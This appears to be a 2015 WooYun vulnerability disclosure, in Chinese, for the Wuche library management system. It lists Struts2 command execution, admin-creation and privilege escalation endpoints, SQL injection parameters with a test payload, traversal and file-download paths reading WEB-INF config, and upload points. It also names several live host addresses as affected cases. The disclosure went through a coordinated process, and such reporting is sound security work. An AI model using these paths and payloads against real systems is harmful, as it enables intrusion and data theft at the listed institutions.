当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128686

漏洞标题:五车图书管理系统漏洞集合(越权/SQL注入/任意文件遍历/下载/上传)

相关厂商:五车信息技术(北京)有限公司

漏洞作者: 路人甲

提交时间:2015-07-25 17:08

修复时间:2015-10-26 08:44

公开时间:2015-10-26 08:44

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向第三方安全合作伙伴开放
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

最后一次提该系统漏洞了
五车图书管理系统漏洞集合(高危越权/SQL注入/任意文件遍历/任意文件下载/任意文件上传)
包括:
命令执行 :N处
高危越权:2处
任意文件遍历:2处
POST型SQL注入:5处
GET型SQL注入:1处
任意文件下载:1处
任意文件上传:3处

详细说明:

注:命令执行重复
关于我们:
五车信息技术(北京)有限公司一直致力于数字出版领域应用,提供相关产品技术和服务。五车公司掌握的数字 出版核心技术与国际同步,可提供服务主导型模式(SOA)完全解决方 案,实现传统出版物数字化、商用数字内容、互联网文献信息资源的无缝集成,具有全球竞争力。
五车图书管理系统漏洞集合(命令执行/高危越权/SQL注入/任意文件遍历/任意文件下载/任意文件上传)
包括:
命令执行 :N处
高危越权:2处
任意文件遍历:2处
POST型SQL注入:5处
GET型SQL注入:1处
任意文件下载:1处
任意文件上传:3处

1、Struts-016命令执行漏洞:
任何一个带.action的页面都存在任意命令执行漏洞!

00.png


2、高危越权(两处):
/5clib/Inuseraction.action?actionkind=reg 增加管理员;增加后提示无权访问实质已经添加到了

01.png


02.png


/5clib/property.action 参数配置 可配置以及获取WEB的物理路径

11.png


3、POST 搜索型注入(五处):
/5clib/bookmanger.action?formAction=bookList
/5clib/bookmanger.action?formAction=bookCatalogList
/5clib/newsContextListAction.action
/5clib/paperManage.action?formAction=paperList
/5clib/userManage.action?formAction=userQuery
测试Paload:【%' AND 1=1 AND '%'='】;下述所有页面中的keyword参数存在注入

03.png


04.png


4、GET型SQL注入(一处):
/5clib/classNavigation.action?formAction=zhongCatalog
该页面下类似:
/5clib/classNavigation.action?formAction=subCatalog&ccode=000_000008&navigation=??? 的链接中ccode参数存在注入

05.png


5、任意文件遍历(两处):
A:/5clib/kindaction.action?kind=music&subkind=subkind&curpage=1 kind可以为video、disc等,点上面的链接抓包subkind参数修改为遍历的路径

06.png


07.png


B:/5clib/kinweblistaction.action?filePath=&kind=disc&curpage=1&actionName=&subkind=c:/windows&doAction=second&pagesize=20&curPage=1&toPage=

12.png


6、任意文件上传:(三处)
上传的时候修改为web的物理路径,可通过越权或者其它获取物理路径
/5clib/addaction.action?kind=music
/5clib/addaction.action?kind=video
/5clib/addaction.action?kind=disc

08.png


09.png


7、任意文件下载:(一处)
/5clib/paperWeb.action?formAction=paperDownLoad&fileName=/../WEB-INF/classes/config/struts-action.xml

10.png


漏洞证明:

Case:

http://183.64.83.104:8081/5clib/bookWeb.action?formAction=ztclass&ccode=000&class=1
http://222.208.6.176:8081/5clib/web.action?formAction=getWebList
http://lyqk.xjlib.org:8081/5clib/web.action?formAction=getWebList
http://sybook.5clib.com:8081/bookWeb.action?formAction=ztclass&ccode=000&class=1
http://210.44.232.43:8081/5clib/bookWeb.action?formAction=ztclass&ccode=000&class=1
...因漏洞危害大,不列举太多...

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-28 08:43

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。 按多个风险点评分,rank 20

最新状态:

暂无